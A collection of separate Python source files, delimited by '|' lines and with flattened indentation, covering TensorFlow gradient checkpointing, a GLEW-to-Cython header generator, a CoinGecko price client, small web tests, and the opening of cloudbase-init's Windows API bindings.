fwd_ops = [op for op in fwd_ops if not '/read' in op.name]
ts_all = ge.filter_ts(fwd_ops, True) # get the tensors
ts_all = [t for t in ts_all if '/read' not in t.name]
ts_all = set(ts_all) - set(xs) - set(ys)
# construct list of tensors to checkpoint during forward pass, if not
# given as input
if type(checkpoints) is not list:
if checkpoints == 'collection':
checkpoints = tf.get_collection('checkpoints')
elif checkpoints == 'speed':
# checkpoint all expensive ops to maximize running speed
checkpoints = ge.filter_ts_from_regex(fwd_ops, 'conv2d|Conv|MatMul')
elif checkpoints == 'memory':
# remove very small tensors and some weird ops
def fixdims(t): # tf.Dimension values are not compatible with int, convert manually
try:
return [int(e if e.value is not None else 64) for e in t]
except:
return [0] # unknown shape
ts_all = [t for t in ts_all if np.prod(fixdims(t.shape)) > MIN_CHECKPOINT_NODE_SIZE]
ts_all = [t for t in ts_all if 'L2Loss' not in t.name]
ts_all = [t for t in ts_all if 'entropy' not in t.name]
ts_all = [t for t in ts_all if 'FusedBatchNorm' not in t.name]
ts_all = [t for t in ts_all if 'Switch' not in t.name]
ts_all = [t for t in ts_all if 'dropout' not in t.name]
# DV: FP16_FIX - need to add 'Cast' layer here to make it work for FP16
ts_all = [t for t in ts_all if 'Cast' not in t.name]
# filter out all tensors that are inputs of the backward graph
with util.capture_ops() as bwd_ops:
tf_gradients(ys, xs, grad_ys, **kwargs)
bwd_inputs = [t for op in bwd_ops for t in op.inputs]
# list of tensors in forward graph that is in input to bwd graph
ts_filtered = list(set(bwd_inputs).intersection(ts_all))
debug_print("Using tensors %s", ts_filtered)
# try two slightly different ways of getting bottlenecks tensors
# to checkpoint
for ts in [ts_filtered, ts_all]:
# get all bottlenecks in the graph
bottleneck_ts = []
for t in ts:
b = set(ge.get_backward_walk_ops(t.op, inclusive=True, within_ops=fwd_ops))
f = set(ge.get_forward_walk_ops(t.op, inclusive=False, within_ops=fwd_ops))
# check that there are not shortcuts
b_inp = set([inp for op in b for inp in op.inputs]).intersection(ts_all)
f_inp = set([inp for op in f for inp in op.inputs]).intersection(ts_all)
if not set(b_inp).intersection(f_inp) and len(b_inp)+len(f_inp) >= len(ts_all):
bottleneck_ts.append(t) # we have a bottleneck!
else:
debug_print("Rejected bottleneck candidate and ops %s", [t] + list(set(ts_all) - set(b_inp) - set(f_inp)))
# success? or try again without filtering?
if len(bottleneck_ts) >= np.sqrt(len(ts_filtered)): # yes, enough bottlenecks found!
break
if not bottleneck_ts:
raise Exception('unable to find bottleneck tensors! please provide checkpoint nodes manually, or use checkpoints="speed".')
# sort the bottlenecks
bottlenecks_sorted_lists = tf_toposort(bottleneck_ts, within_ops=fwd_ops)
sorted_bottlenecks = [t for ts in bottlenecks_sorted_lists for t in ts]
# save an approximately optimal number ~ sqrt(N)
N = len(ts_filtered)
if len(bottleneck_ts) <= np.ceil(np.sqrt(N)):
checkpoints = sorted_bottlenecks
else:
step = int(np.ceil(len(bottleneck_ts) / np.sqrt(N)))
checkpoints = sorted_bottlenecks[step::step]
else:
raise Exception('%s is unsupported input for "checkpoints"' % (checkpoints,))
checkpoints = list(set(checkpoints).intersection(ts_all))
# at this point automatic selection happened and checkpoints is list of nodes
assert isinstance(checkpoints, list)
debug_print("Checkpoint nodes used: %s", checkpoints)
# better error handling of special cases
# xs are already handled as checkpoint nodes, so no need to include them
xs_intersect_checkpoints = set(xs).intersection(set(checkpoints))
if xs_intersect_checkpoints:
debug_print("Warning, some input nodes are also checkpoint nodes: %s",
xs_intersect_checkpoints)
ys_intersect_checkpoints = set(ys).intersection(set(checkpoints))
debug_print("ys: %s, checkpoints: %s, intersect: %s", ys, checkpoints,
ys_intersect_checkpoints)
# saving an output node (ys) gives no benefit in memory while creating
# new edge cases, exclude them
if ys_intersect_checkpoints:
debug_print("Warning, some output nodes are also checkpoints nodes: %s",
format_ops(ys_intersect_checkpoints))
# remove initial and terminal nodes from checkpoints list if present
checkpoints = list(set(checkpoints) - set(ys) - set(xs))
# check that we have some nodes to checkpoint
if not checkpoints:
raise Exception('no checkpoints nodes found or given as input! ')
# disconnect dependencies between checkpointed tensors
checkpoints_disconnected = {}
for x in checkpoints:
if x.op and x.op.name is not None:
grad_node = tf.stop_gradient(x, name=x.op.name+"_sg")
else:
grad_node = tf.stop_gradient(x)
checkpoints_disconnected[x] = grad_node
# partial derivatives to the checkpointed tensors and xs
ops_to_copy = fast_backward_ops(seed_ops=[y.op for y in ys],
stop_at_ts=checkpoints, within_ops=fwd_ops)
debug_print("Found %s ops to copy within fwd_ops %s, seed %s, stop_at %s",
len(ops_to_copy), fwd_ops, [r.op for r in ys], checkpoints)
debug_print("ops_to_copy = %s", ops_to_copy)
debug_print("Processing list %s", ys)
copied_sgv, info = ge.copy_with_input_replacements(ge.sgv(ops_to_copy), {})
for origin_op, op in info._transformed_ops.items():
op._set_device(origin_op.node_def.device)
copied_ops = info._transformed_ops.values()
debug_print("Copied %s to %s", ops_to_copy, copied_ops)
ge.reroute_ts(checkpoints_disconnected.values(), checkpoints_disconnected.keys(), can_modify=copied_ops)
debug_print("Rewired %s in place of %s restricted to %s",
checkpoints_disconnected.values(), checkpoints_disconnected.keys(), copied_ops)
# get gradients with respect to current boundary + original x's
copied_ys = [info._transformed_ops[y.op]._outputs[0] for y in ys]
boundary = list(checkpoints_disconnected.values())
dv = tf_gradients(ys=copied_ys, xs=boundary+xs, grad_ys=grad_ys, **kwargs)
debug_print("Got gradients %s", dv)
debug_print("for %s", copied_ys)
debug_print("with respect to %s", boundary+xs)
inputs_to_do_before = [y.op for y in ys]
if grad_ys is not None:
inputs_to_do_before += grad_ys
wait_to_do_ops = list(copied_ops) + [g.op for g in dv if g is not None]
my_add_control_inputs(wait_to_do_ops, inputs_to_do_before)
# partial derivatives to the checkpointed nodes
# dictionary of "node: backprop" for nodes in the boundary
d_checkpoints = {r: dr for r,dr in zip(checkpoints_disconnected.keys(),
dv[:len(checkpoints_disconnected)])}
# partial derivatives to xs (usually the params of the neural net)
d_xs = dv[len(checkpoints_disconnected):]
# incorporate derivatives flowing through the checkpointed nodes
checkpoints_sorted_lists = tf_toposort(checkpoints, within_ops=fwd_ops)
for ts in checkpoints_sorted_lists[::-1]:
debug_print("Processing list %s", ts)
checkpoints_other = [r for r in checkpoints if r not in ts]
checkpoints_disconnected_other = [checkpoints_disconnected[r] for r in checkpoints_other]
# copy part of the graph below current checkpoint node, stopping at
# other checkpoints nodes
ops_to_copy = fast_backward_ops(within_ops=fwd_ops, seed_ops=[r.op for r in ts], stop_at_ts=checkpoints_other)
debug_print("Found %s ops to copy within %s, seed %s, stop_at %s",
len(ops_to_copy), fwd_ops, [r.op for r in ts],
checkpoints_other)
debug_print("ops_to_copy = %s", ops_to_copy)
if not ops_to_copy: # we're done!
break
copied_sgv, info = ge.copy_with_input_replacements(ge.sgv(ops_to_copy), {})
for origin_op, op in info._transformed_ops.items():
op._set_device(origin_op.node_def.device)
copied_ops = info._transformed_ops.values()
debug_print("Copied %s to %s", ops_to_copy, copied_ops)
ge.reroute_ts(checkpoints_disconnected_other, checkpoints_other, can_modify=copied_ops)
debug_print("Rewired %s in place of %s restricted to %s",
checkpoints_disconnected_other, checkpoints_other, copied_ops)
# gradient flowing through the checkpointed node
boundary = [info._transformed_ops[r.op]._outputs[0] for r in ts]
substitute_backprops = [d_checkpoints[r] for r in ts]
dv = tf_gradients(boundary,
checkpoints_disconnected_other+xs,
grad_ys=substitute_backprops, **kwargs)
debug_print("Got gradients %s", dv)
debug_print("for %s", boundary)
debug_print("with respect to %s", checkpoints_disconnected_other+xs)
debug_print("with boundary backprop substitutions %s", substitute_backprops)
inputs_to_do_before = [d_checkpoints[r].op for r in ts]
wait_to_do_ops = list(copied_ops) + [g.op for g in dv if g is not None]
my_add_control_inputs(wait_to_do_ops, inputs_to_do_before)
# partial derivatives to the checkpointed nodes
for r, dr in zip(checkpoints_other, dv[:len(checkpoints_other)]):
if dr is not None:
if d_checkpoints[r] is None:
d_checkpoints[r] = dr
else:
d_checkpoints[r] += dr
def _unsparsify(x):
if not isinstance(x, tf.IndexedSlices):
return x
assert x.dense_shape is not None, "memory_saving_gradients encountered sparse gradients of unknown shape"
indices = x.indices
while indices.shape.ndims < x.values.shape.ndims:
indices = tf.expand_dims(indices, -1)
return tf.scatter_nd(indices, x.values, x.dense_shape)
# partial derivatives to xs (usually the params of the neural net)
d_xs_new = dv[len(checkpoints_other):]
for j in range(len(xs)):
if d_xs_new[j] is not None:
if d_xs[j] is None:
d_xs[j] = _unsparsify(d_xs_new[j])
else:
d_xs[j] += _unsparsify(d_xs_new[j])
return d_xs
def tf_toposort(ts, within_ops=None):
all_ops = ge.get_forward_walk_ops([x.op for x in ts], within_ops=within_ops)
deps = {}
for op in all_ops:
for o in op.outputs:
deps[o] = set(op.inputs)
sorted_ts = toposort(deps)
# only keep the tensors from our original list
ts_sorted_lists = []
for l in sorted_ts:
keep = list(set(l).intersection(ts))
if keep:
ts_sorted_lists.append(keep)
return ts_sorted_lists
def fast_backward_ops(within_ops, seed_ops, stop_at_ts):
bwd_ops = set(ge.get_backward_walk_ops(seed_ops, stop_at_ts=stop_at_ts))
ops = bwd_ops.intersection(within_ops).difference([t.op for t in stop_at_ts])
return list(ops)
@contextlib.contextmanager
def capture_ops():
"""Decorator to capture ops created in the block.
with capture_ops() as ops:
# create some ops
print(ops) # => prints ops created.
"""
micros = int(time.time()*10**6)
scope_name = str(micros)
op_list = []
with tf.name_scope(scope_name):
yield op_list
g = tf.get_default_graph()
op_list.extend(ge.select_ops(scope_name+"/.*", graph=g))
def _to_op(tensor_or_op):
if hasattr(tensor_or_op, "op"):
return tensor_or_op.op
return tensor_or_op
def _to_ops(iterable):
if not _is_iterable(iterable):
return iterable
return [_to_op(i) for i in iterable]
def _is_iterable(o):
try:
_ = iter(o)
except Exception:
return False
return True
DEBUG_LOGGING=False
def debug_print(s, *args):
"""Like logger.log, but also replaces all TensorFlow ops/tensors with their
names. Sensitive to value of DEBUG_LOGGING, see enable_debug/disable_debug
Usage:
debug_print("see tensors %s for %s", tensorlist, [1,2,3])
"""
if DEBUG_LOGGING:
formatted_args = [format_ops(arg) for arg in args]
print("DEBUG "+s % tuple(formatted_args))
def format_ops(ops, sort_outputs=True):
"""Helper method for printing ops. Converts Tensor/Operation op to op.name,
rest to str(op)."""
if hasattr(ops, '__iter__') and not isinstance(ops, str):
l = [(op.name if hasattr(op, "name") else str(op)) for op in ops]
if sort_outputs:
return sorted(l)
return l
else:
return ops.name if hasattr(ops, "name") else str(ops)
def my_add_control_inputs(wait_to_do_ops, inputs_to_do_before):
for op in wait_to_do_ops:
ci = [i for i in inputs_to_do_before if op.control_inputs is None or i not in op.control_inputs]
ge.add_control_inputs(op, ci)
|
"""
Script taken from: https://github.com/orlp/pygrafix
Appropriate Licence applies!
"""
import argparse
import os
import pathlib
import re
def generate_pxd(glew_header_loc, dest="."):
with open(glew_header_loc) as fin:
data = fin.read()
# cython doesn't support const
data = re.sub(r"\bconst\b", "", data)
lines = data.split("\n")
handled_lines = set()
function_types = {}
export_functions = {}
function_defs = []
enums = []
# read in function types
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"typedef\s+([^(]+)\([^*]+\*\s*([a-zA-Z_][a-zA-Z0-9_]+)\)\s*(\(.+\))\s*;",
line,
)[0]
except IndexError:
continue
function_types[result[1]] = (result[0].strip(), result[2])
handled_lines.add(linenr)
# read in exported functions
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"GLEW_FUN_EXPORT\s+([a-zA-Z_][a-zA-Z0-9_]+)\s+([a-zA-Z_][a-zA-Z0-9_]+)",
line,
)[0]
except IndexError:
continue
export_functions[result[1]] = result[0]
handled_lines.add(linenr)
# match exported functions with function types
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"#define\s+([a-zA-Z_][a-zA-Z0-9_]+)\s+GLEW_GET_FUN\s*\(\s*([a-zA-Z_][a-zA-Z0-9_]+)\s*\)",
line,
)[0]
except IndexError:
continue
export_func = export_functions[result[1]]
function_defs.append(
function_types[export_func][0]
+ " "
+ result[0]
+ function_types[export_func][1]
)
handled_lines.add(linenr)
# add GLAPIENTRY functions
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"GLAPI\s+([a-zA-Z_][a-zA-Z0-9_]+)[^a-zA-Z_]+GLAPIENTRY[^a-zA-Z_]+([a-zA-Z_][a-zA-Z0-9_]+)\s*(\(.+\))\s*;",
line,
)[0]
except IndexError:
continue
function_defs.append(" ".join(result))
handled_lines.add(linenr)
# read in numeric defines as enums
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"#define\s+([a-zA-Z_][a-zA-Z0-9_]+)\s+(?:(?:0x[0-9a-fA-F]+)|[0-9]+)",
line,
)[0]
except IndexError:
continue
enums.append(result)
handled_lines.add(linenr)
# read in GLEW vars as enums
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"#define\s+([a-zA-Z_][a-zA-Z0-9_]+)\s+GLEW_GET_VAR\(.+\)", line
)[0]
except IndexError:
continue
enums.append(result)
handled_lines.add(linenr)
# also accept GL to GL defines as enums
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"#define\s+(GL_[a-zA-Z0-9_]+)\s+GL_[a-zA-Z0-9_]+", line
)[0]
except IndexError:
continue
enums.append(result)
handled_lines.add(linenr)
pxdheader = """# cython: language_level=3
from libc.stdint cimport int64_t, uint64_t
cdef extern from "include_glew.h":
ctypedef struct _cl_context:
pass
ctypedef struct _cl_event:
pass
ctypedef struct __GLsync:
pass
ctypedef unsigned short wchar_t
ctypedef int ptrdiff_t
ctypedef unsigned int GLenum
ctypedef unsigned int GLbitfield
ctypedef unsigned int GLuint
ctypedef int GLint
ctypedef int GLsizei
ctypedef char GLchar
ctypedef unsigned char GLboolean
ctypedef signed char GLbyte
ctypedef short GLshort
ctypedef unsigned char GLubyte
ctypedef unsigned short GLushort
ctypedef unsigned long GLulong
ctypedef float GLfloat
ctypedef float GLclampf
ctypedef double GLdouble
ctypedef double GLclampd
ctypedef int GLfixed
ctypedef int GLclampx
ctypedef void GLvoid
ctypedef int64_t GLint64EXT
ctypedef uint64_t GLuint64EXT
ctypedef GLint64EXT GLint64
ctypedef GLuint64EXT GLuint64
ctypedef __GLsync *GLsync
ctypedef char GLcharARB
ctypedef ptrdiff_t GLintptr
ctypedef ptrdiff_t GLsizeiptr
ctypedef _cl_context *cl_context
ctypedef _cl_event *cl_event
ctypedef unsigned int GLhandleARB
ctypedef ptrdiff_t GLintptrARB
ctypedef ptrdiff_t GLsizeiptrARB
ctypedef void* GLeglClientBufferEXT
ctypedef unsigned short GLhalf
ctypedef GLintptr GLvdpauSurfaceNV
ctypedef long GLVULKANPROCNV
ctypedef void *GLeglImageOES # GL_EXT_EGL_image_storage
ctypedef void (__stdcall *GLDEBUGPROCAMD)(GLuint id, GLenum category, GLenum severity, GLsizei length, GLchar *message, GLvoid *userParam)
ctypedef void (__stdcall *GLDEBUGPROCARB)(GLenum source, GLenum type, GLuint id, GLenum severity, GLsizei length, GLchar *message, GLvoid *userParam)
ctypedef void (__stdcall *GLDEBUGPROC)(GLenum source, GLenum type, GLuint id, GLenum severity, GLsizei length, const GLchar* message, GLvoid* userParam)
ctypedef void (__stdcall *GLLOGPROCREGAL)(GLenum stream, GLsizei length, const GLchar *message, GLvoid *context)
GLenum glewInit()
GLboolean glewIsSupported(char *name)
GLboolean glewIsExtensionSupported(char *name)
GLboolean glewGetExtension(char* name)
GLubyte *glewGetErrorString(GLenum error)
GLubyte *glewGetString(GLenum name)
"""
dest = pathlib.Path(dest)
dest.mkdir(exist_ok=True, parents=True)
with (dest / "glew.pxd").open("w") as fout:
data = pxdheader
data += " enum:\n"
data += "\n".join(" " + enum for enum in set(enums))
data += "\n\n"
def mod_func(func):
keywords = [
"and",
"del",
"for",
"is",
"raise",
"assert",
"elif",
"from",
"lambda",
"return",
"break",
"else",
"global",
"not",
"try",
"class",
"except",
"if",
"or",
"while",
"continue",
"exec",
"import",
"pass",
"yield",
"def",
"finally",
"in",
"print",
]
# beautify functions
func = re.sub(r"\s+", " ", func) # collapse whitespace
func = re.sub(r"\s*([()])\s*", r"\1", func) # no whitespace near brackets
func = re.sub(r"\s*,\s*", r", ", func) # only whitespace __after__ comma
func = re.sub(
r"\s*(\*+)\s*", r" \1", func
) # beautify pointers in functions
# cython doesn't support (void), need to do () for no arguments instead
func = re.sub(r"\(void\)", "()", func)
# keywords...
for keyword in keywords:
func = re.sub(r"\b%s\b" % keyword, keyword + "_", func)
return func
data += "\n".join(" " + mod_func(func) for func in function_defs)
fout.write(data)
with (dest / "unhandled_glew.h").open("w") as fout:
data = "\n".join(
lines[linenr] for linenr in range(len(lines)) if linenr not in handled_lines
)
data = re.sub("\n\n+", "\n", data)
fout.write(data)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("glew_header_loc")
parser.add_argument("destination")
args = parser.parse_args()
generate_pxd(args.glew_header_loc, dest=args.destination)
|
import logging
from urllib.parse import urljoin
import requests
from eth_typing import ChecksumAddress
from safe_transaction_service.tokens.clients.exceptions import CannotGetPrice
logger = logging.getLogger(__name__)
class CoingeckoClient:
base_url = 'https://api.coingecko.com/'
def __init__(self):
self.http_session = requests.Session()
def _get_price(self, url: str, name: str):
try:
response = self.http_session.get(url, timeout=10)
if not response.ok:
raise CannotGetPrice
# Result is returned with lowercased `token_address`
price = response.json().get(name)
if price and price.get('usd'):
return price['usd']
else:
raise CannotGetPrice(f'Price from url={url} is {price}')
except (ValueError, IOError) as e:
logger.warning('Problem getting usd value on coingecko for token-name=%s', name)
raise CannotGetPrice from e
def get_price(self, name: str) -> float:
"""
:param name: coin name
:return: usd price for token name, 0. if not found
"""
name = name.lower()
url = urljoin(self.base_url,
f'/api/v3/simple/price?ids={name}&vs_currencies=usd')
return self._get_price(url, name)
def get_token_price(self, token_address: ChecksumAddress) -> float:
"""
:param token_address:
:return: usd price for token address, 0. if not found
"""
token_address = token_address.lower()
url = urljoin(self.base_url,
f'api/v3/simple/token_price/ethereum?contract_addresses={token_address}&vs_currencies=usd')
return self._get_price(url, token_address)
def get_ewt_usd_price(self) -> float:
return self.get_price('energy-web-token')
|
# -*- coding: utf-8 -*-
from selenium_tests.UserDriverTest import UserDriverTest
from selenium.webdriver.common.by import By
class TestHideApplication(UserDriverTest):
def test_hide_application(self):
self.wait_until_application_list_loaded()
self.type_text_in_element_located(By.ID, "search-input", "foobarheho")
self.wait_until_text_inside_element_located(By.ID, "applistentries", "")
|
import anachronos
from e2e_test.runner import http
class ExceptionResourceTest(anachronos.TestCase):
def setUp(self):
self.http = http.with_path("/api/error")
def test_got500OnInternalServerError(self):
response = self.http.get("")
self.assertEqual(500, response.status_code)
def test_got404OnResourceNotFound(self):
response = self.http.get("/inexistent-path")
self.assertEqual(404, response.status_code)
def test_got405MethodNotAllowed(self):
response = self.http.post("")
self.assertEqual(405, response.status_code)
def test_givenNullPointerException_thenReturn500InternalServerError(self):
response = self.http.get("/none")
self.assertEqual(500, response.status_code)
if __name__ == '__main__':
anachronos.run_tests()
|
from st_library import Library
st_lib = Library()
st_lib.set_token('token')
st_lib.set_config_id('52db99d3-edfb-44c5-b97a-f09df4402081')
print(st_lib.unstruct_data.download_file("19a29b9b-bea2-40fb-89c4-555bba829539","image.jpg"))
|
# Copyright 2012 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import ctypes
from ctypes import wintypes
import os
import re
import struct
import subprocess
import time
import netaddr
from oslo_log import log as oslo_logging
import pywintypes
import six
from six.moves import winreg
from tzlocal import windows_tz
import win32api
from win32com import client
import win32net
import win32netcon
import win32process
import win32security
import win32service
import winerror
from cloudbaseinit import constant
from cloudbaseinit import exception
from cloudbaseinit.osutils import base
from cloudbaseinit.utils import classloader
from cloudbaseinit.utils import retry_decorator
from cloudbaseinit.utils.windows import disk
from cloudbaseinit.utils.windows import network
from cloudbaseinit.utils.windows import privilege
from cloudbaseinit.utils.windows import timezone
from cloudbaseinit.utils.windows import wmi_loader
wmi = wmi_loader.wmi()
LOG = oslo_logging.getLogger(__name__)
AF_INET = 2
AF_INET6 = 23
UNICAST = 1
MANUAL = 1
PREFERRED_ADDR = 4
advapi32 = ctypes.windll.advapi32
kernel32 = ctypes.windll.kernel32
netapi32 = ctypes.windll.netapi32
userenv = ctypes.windll.userenv
iphlpapi = ctypes.windll.iphlpapi
Ws2_32 = ctypes.windll.Ws2_32
setupapi = ctypes.windll.setupapi
msvcrt = ctypes.cdll.msvcrt
ntdll = ctypes.windll.ntdll
secur32 = ctypes.windll.secur32
class Win32_PROFILEINFO(ctypes.Structure):
_fields_ = [
('dwSize', wintypes.DWORD),
('dwFlags', wintypes.DWORD),
('lpUserName', wintypes.LPWSTR),
('lpProfilePath', wintypes.LPWSTR),
('lpDefaultPath', wintypes.LPWSTR),
('lpServerName', wintypes.LPWSTR),
('lpPolicyPath', wintypes.LPWSTR),
('hprofile', wintypes.HANDLE)
]
class Win32_LOCALGROUP_MEMBERS_INFO_3(ctypes.Structure):
_fields_ = [
('lgrmi3_domainandname', wintypes.LPWSTR)
]
class Win32_MIB_IPFORWARDROW(ctypes.Structure):
_fields_ = [
('dwForwardDest', wintypes.DWORD),
('dwForwardMask', wintypes.DWORD),
('dwForwardPolicy', wintypes.DWORD),
('dwForwardNextHop', wintypes.DWORD),
('dwForwardIfIndex', wintypes.DWORD),
('dwForwardType', wintypes.DWORD),
('dwForwardProto', wintypes.DWORD),
('dwForwardAge', wintypes.DWORD),
('dwForwardNextHopAS', wintypes.DWORD),
('dwForwardMetric1', wintypes.DWORD),
('dwForwardMetric2', wintypes.DWORD),
('dwForwardMetric3', wintypes.DWORD),
('dwForwardMetric4', wintypes.DWORD),
('dwForwardMetric5', wintypes.DWORD)
]
class Win32_MIB_IPFORWARDTABLE(ctypes.Structure):
_fields_ = [
('dwNumEntries', wintypes.DWORD),
('table', Win32_MIB_IPFORWARDROW * 1)
]
class Win32_OSVERSIONINFOEX_W(ctypes.Structure):
_fields_ = [
('dwOSVersionInfoSize', wintypes.DWORD),
('dwMajorVersion', wintypes.DWORD),
('dwMinorVersion', wintypes.DWORD),
('dwBuildNumber', wintypes.DWORD),
('dwPlatformId', wintypes.DWORD),
('szCSDVersion', wintypes.WCHAR * 128),
('wServicePackMajor', wintypes.WORD),
('wServicePackMinor', wintypes.WORD),
('wSuiteMask', wintypes.WORD),
('wProductType', wintypes.BYTE),
('wReserved', wintypes.BYTE)
]
class Win32_SP_DEVICE_INTERFACE_DATA(ctypes.Structure):
_fields_ = [
('cbSize', wintypes.DWORD),
('InterfaceClassGuid', disk.GUID),
('Flags', wintypes.DWORD),
('Reserved', ctypes.POINTER(wintypes.ULONG))
]
class Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W(ctypes.Structure):
_fields_ = [
('cbSize', wintypes.DWORD),
('DevicePath', ctypes.c_byte * 2)
]
class Win32_STORAGE_DEVICE_NUMBER(ctypes.Structure):
_fields_ = [
('DeviceType', wintypes.DWORD),
('DeviceNumber', wintypes.DWORD),
('PartitionNumber', wintypes.DWORD)
]
class Win32_STARTUPINFO_W(ctypes.Structure):
_fields_ = [
('cb', wintypes.DWORD),
('lpReserved', wintypes.LPWSTR),
('lpDesktop', wintypes.LPWSTR),
('lpTitle', wintypes.LPWSTR),
('dwX', wintypes.DWORD),
('dwY', wintypes.DWORD),
('dwXSize', wintypes.DWORD),
('dwYSize', wintypes.DWORD),
('dwXCountChars', wintypes.DWORD),
('dwYCountChars', wintypes.DWORD),
('dwFillAttribute', wintypes.DWORD),
('dwFlags', wintypes.DWORD),
('wShowWindow', wintypes.WORD),
('cbReserved2', wintypes.WORD),
('lpReserved2', ctypes.POINTER(wintypes.BYTE)),
('hStdInput', wintypes.HANDLE),
('hStdOutput', wintypes.HANDLE),
('hStdError', wintypes.HANDLE),
]
class Win32_PROCESS_INFORMATION(ctypes.Structure):
_fields_ = [
('hProcess', wintypes.HANDLE),
('hThread', wintypes.HANDLE),
('dwProcessId', wintypes.DWORD),
('dwThreadId', wintypes.DWORD),
]
advapi32.CreateProcessAsUserW.argtypes = [wintypes.HANDLE,
wintypes.LPCWSTR,
wintypes.LPWSTR,
ctypes.c_void_p,
ctypes.c_void_p,
wintypes.BOOL,
wintypes.DWORD,
ctypes.c_void_p,
wintypes.LPCWSTR,
ctypes.POINTER(
Win32_STARTUPINFO_W),
ctypes.POINTER(
Win32_PROCESS_INFORMATION)]
advapi32.CreateProcessAsUserW.restype = wintypes.BOOL
msvcrt.malloc.argtypes = [ctypes.c_size_t]
msvcrt.malloc.restype = ctypes.c_void_p
msvcrt.free.argtypes = [ctypes.c_void_p]
msvcrt.free.restype = None
ntdll.RtlGetVersion.argtypes = [
ctypes.POINTER(Win32_OSVERSIONINFOEX_W)]
ntdll.RtlGetVersion.restype = wintypes.DWORD
ntdll.RtlVerifyVersionInfo.argtypes = [
ctypes.POINTER(Win32_OSVERSIONINFOEX_W),
wintypes.DWORD, wintypes.ULARGE_INTEGER]
ntdll.RtlVerifyVersionInfo.restype = wintypes.DWORD
kernel32.VerSetConditionMask.argtypes = [wintypes.ULARGE_INTEGER,
wintypes.DWORD,
wintypes.BYTE]
kernel32.VerSetConditionMask.restype = wintypes.ULARGE_INTEGER
kernel32.SetComputerNameExW.argtypes = [ctypes.c_int, wintypes.LPCWSTR]
kernel32.SetComputerNameExW.restype = wintypes.BOOL
kernel32.GetLogicalDriveStringsW.argtypes = [wintypes.DWORD, wintypes.LPWSTR]
kernel32.GetLogicalDriveStringsW.restype = wintypes.DWORD
kernel32.GetDriveTypeW.argtypes = [wintypes.LPCWSTR]
kernel32.GetDriveTypeW.restype = wintypes.UINT
kernel32.CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD,
wintypes.DWORD, wintypes.LPVOID,
wintypes.DWORD, wintypes.DWORD,
wintypes.HANDLE]
kernel32.CreateFileW.restype = wintypes.HANDLE
kernel32.DeviceIoControl.argtypes = [wintypes.HANDLE, wintypes.DWORD,
wintypes.LPVOID, wintypes.DWORD,
wintypes.LPVOID, wintypes.DWORD,
ctypes.POINTER(wintypes.DWORD),
wintypes.LPVOID]
kernel32.DeviceIoControl.restype = wintypes.BOOL
kernel32.GetProcessHeap.argtypes = []
kernel32.GetProcessHeap.restype = wintypes.HANDLE
kernel32.HeapAlloc.argtypes = [wintypes.HANDLE, wintypes.DWORD,
ctypes.c_size_t]
kernel32.HeapAlloc.restype = wintypes.LPVOID
kernel32.HeapFree.argtypes = [wintypes.HANDLE, wintypes.DWORD,
wintypes.LPVOID]
kernel32.HeapFree.restype = wintypes.BOOL
kernel32.GetVolumeNameForVolumeMountPointW.argtypes = [wintypes.LPCWSTR,
wintypes.LPWSTR,
wintypes.DWORD]
kernel32.GetVolumeNameForVolumeMountPointW.restype = wintypes.BOOL
kernel32.GetVolumePathNamesForVolumeNameW.argtypes = [wintypes.LPCWSTR,
wintypes.LPWSTR,
wintypes.DWORD,
ctypes.POINTER(
wintypes.DWORD)]
kernel32.GetVolumePathNamesForVolumeNameW.restype = wintypes.BOOL
kernel32.FindFirstVolumeW.argtypes = [wintypes.LPWSTR, wintypes.DWORD]
kernel32.FindFirstVolumeW.restype = wintypes.HANDLE
kernel32.FindNextVolumeW.argtypes = [wintypes.HANDLE,
wintypes.LPWSTR,
wintypes.DWORD]
kernel32.FindNextVolumeW.restype = wintypes.BOOL
kernel32.FindVolumeClose.argtypes = [wintypes.HANDLE]
kernel32.FindVolumeClose.restype = wintypes.BOOL
iphlpapi.GetIpForwardTable.argtypes = [
ctypes.POINTER(Win32_MIB_IPFORWARDTABLE),
ctypes.POINTER(wintypes.ULONG),
wintypes.BOOL]
iphlpapi.GetIpForwardTable.restype = wintypes.DWORD
Ws2_32.inet_ntoa.restype = ctypes.c_char_p
secur32.GetUserNameExW.argtypes = [wintypes.DWORD,
wintypes.LPWSTR,
ctypes.POINTER(wintypes.ULONG)]
secur32.GetUserNameExW.restype = wintypes.BOOL
setupapi.SetupDiGetClassDevsW.argtypes = [ctypes.POINTER(disk.GUID),
wintypes.LPCWSTR,
wintypes.HANDLE,
wintypes.DWORD]
setupapi.SetupDiGetClassDevsW.restype = wintypes.HANDLE
setupapi.SetupDiEnumDeviceInterfaces.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
ctypes.POINTER(disk.GUID),
wintypes.DWORD,
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DATA)]
setupapi.SetupDiEnumDeviceInterfaces.restype = wintypes.BOOL
setupapi.SetupDiGetDeviceInterfaceDetailW.argtypes = [
wintypes.HANDLE,
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DATA),
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W),
wintypes.DWORD,
ctypes.POINTER(wintypes.DWORD),
wintypes.LPVOID]
setupapi.SetupDiGetDeviceInterfaceDetailW.restype = wintypes.BOOL
setupapi.SetupDiDestroyDeviceInfoList.argtypes = [wintypes.HANDLE]
setupapi.SetupDiDestroyDeviceInfoList.restype = wintypes.BOOL
VER_MAJORVERSION = 1
VER_MINORVERSION = 2
VER_BUILDNUMBER = 4
VER_GREATER_EQUAL = 3
GUID_DEVINTERFACE_DISK = disk.GUID(0x53f56307, 0xb6bf, 0x11d0, 0x94, 0xf2,
